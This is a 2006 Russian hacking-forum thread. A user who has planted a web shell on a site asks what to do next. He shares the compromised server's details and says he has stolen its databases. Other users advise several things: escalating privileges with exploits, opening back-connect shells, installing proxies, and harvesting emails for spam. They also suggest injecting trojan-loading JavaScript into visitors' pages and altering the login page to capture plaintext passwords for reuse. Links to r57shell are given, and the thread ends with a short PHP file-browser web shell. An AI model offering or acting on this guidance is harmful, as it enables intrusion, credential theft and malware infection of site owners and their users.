Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Залил шелл, что дальше ? (https://forum.antichat.xyz/showthread.php?t=26551)

NIGHT_WOLF 04.11.2006 21:31
Залил шелл, что дальше ?
 
Залил на сайт шелл через уязвимость в форуме.
Дефейсить не интересно.
Можно как то поднять права выше, получить хостера ?
Что вообще можно получить с этого шела ?

k1U$4@ 04.11.2006 21:43
вопрос: зачем залил: спортивный интерес или кровная месть???

если интерес: ну поройся там, сям, поищи инфу какую нить, залей еще чего-нить интересное, когда админ ету дырку заклеет, залезть опять, админ точно повесится...

месть? куси и кроши шоб ни кусочка не осталось, тока покоцаная главная страничка с надписью

" ЗДЕСЬ БЫЛ ВАСЯ :) "

З.Ы. тока лучше не тяни... обломают.

k1U$4@ 04.11.2006 21:45
З.З.Ы. ну, инфа - самое наверное важное: номера, аси, пароли и прочая по@бень...

Utochka 04.11.2006 21:47
для начала глянь версию операционки, потом поищи сплойты под эту версию. Потом бекконнект тебе в руки и юзай сплойт. а вообще вот почитай

http://hackedpro.org/forum/showthread.php?t=7

NIGHT_WOLF 05.11.2006 09:57
uname -a выдаёт
FreeBSD voleri-a.*****.ru 6.2-PRERELEASE FreeBSD 6.2-PRERELEASE #0: Tue Oct 3 18:28:07 MSD 2006 root@voleri.*****.ru:/usr/obj/usr/src/sys/work amd64
Система я так понял FreeBSD 6.2-PRERELEASE искал на неё сплоиты но не нашёл, есть только для 6.1 и ниже.
Базы данных форума и сайта я слил, потом буду расшифровывать.
Крушить ничего не хочу, хочется что нибудь полезного с этого поиметь.
А что такое бекконнект ?

Zitt 05.11.2006 12:28
Цитата:
А что такое бекконнект ?
На тачке открывается порт для подключения к которому ты и конеектишся. И дальше работаеш через консоль.

nc.STRIEM 05.11.2006 14:21
Цитата:
Сообщение от NIGHT_WOLF
Залил на сайт шелл через уязвимость в форуме.
Дефейсить не интересно.
Можно как то поднять права выше, получить хостера ?
Что вообще можно получить с этого шела ?
Ставь прокси))
Делай дамп баз! посмотри мож в них че интересное)) ну как минимум спам база уже будет!
Можеш в гланую страничку добавить Java Script который будет загружать и запускать троянца на комп жертв))

swf 05.11.2006 19:05
А откуда кстати можно хороший backconect слить??

steamer 05.11.2006 19:49
в продолжение темы. А какой прокси посоветуете ставить, а то у меня таже ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

steamer 05.11.2006 19:49
в продолжение темы. А какой прокси посоветуете ставить, а то у меня та же ситуация. Нашел сервак, залил шел, базы скачал (5000 мейлов), че дальше делать не знаю, ну полазил там по остальным сайтом на этой машине и все.

Talisman 05.11.2006 20:14
если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде, затем проверяются эти пароли на юзерские аськи, мыла etc ))) (чтоб хеши не брутить) (и если прав на перехапись скриптов хватает)

nc.STRIEM 05.11.2006 21:25
Цитата:
Сообщение от steamer
А какой прокси посоветуете
3Proxy Статья

NIGHT_WOLF 05.11.2006 21:49
Цитата:
Сообщение от Talisman
если кодить умеешь - то за 5 минут к странице логининга дописывается плагин, который сохраняет пароли в открытом виде.
Не подскажешь где про это можно почитать ?
Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)

flipper 11.11.2006 13:30
Цитата:
Сообщение от NIGHT_WOLF
Не подскажешь где про это можно почитать ?
Да кстати может кто нибудь поделиться r57shell 1.31 а то rst.void закрыли и нескачаешь, если есть то лучше исправленный =)
http://rst.void.ru/download/r57shell.txt.gz
http://rst.void.ru/r57shell_create.php
А по мне лучше: http://www.security-teams.net/index.php?showtopic=3429

nc.STRIEM 12.11.2006 14:43
вот держи небольшой проводник:
PHP код:
<?php
 if(!isset($_GET['dir']))
   $_GET['dir']='.';
   if(is_dir($_GET['dir']))
 {
  print "<body bgcolor=d0d0d0><table><tr><td align=center><b>[имя]</b></td><td align=center><b>[права]</b></td><td align=center><b>[размер]</b></td><tr>";
     $dira=opendir($_GET['dir']);
     while (false!==(($file readdir($dira))))
     {  
     if($file=='.')
       continue;
      $fs="-";
       if(is_dir($file))////есле папка/////
            echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=660000>$file</font></a></td><td align=center><br>";
          else 
        {
         echo "<tr><td><a href=$SCRIPT_NAME?dir=".$_GET['dir']."/$file><font color=006600>$file</font></a></td><td align=center>-<br>";
          $fs=filesize($_GET['dir']."/$file");
             if($fs!=0)
               {
                $ost=$fs%1024;
                $fs-=$ost;
                if($fs!=0)
                  $fs/=1024;
                else $fs=1;
                }
          }
          if(is_readable($file)) echo "r"; else echo "-";
          if(is_writable($file)) echo "w"; else echo "-";
          if(is_executable($file)) echo "x"; else echo "-";
           echo "</td><td align=center>$fs</td></tr>";            
        }
     }
     else 
     {
     print "<pre>";
     foreach(file($_GET['dir']) as $val)
     echo htmlspecialchars($val);
     print "</pre>";
     }
?>

bul.666 12.11.2006 15:34
2GrAmOzEkA вот и ответ Permission denied!


Время: 11:58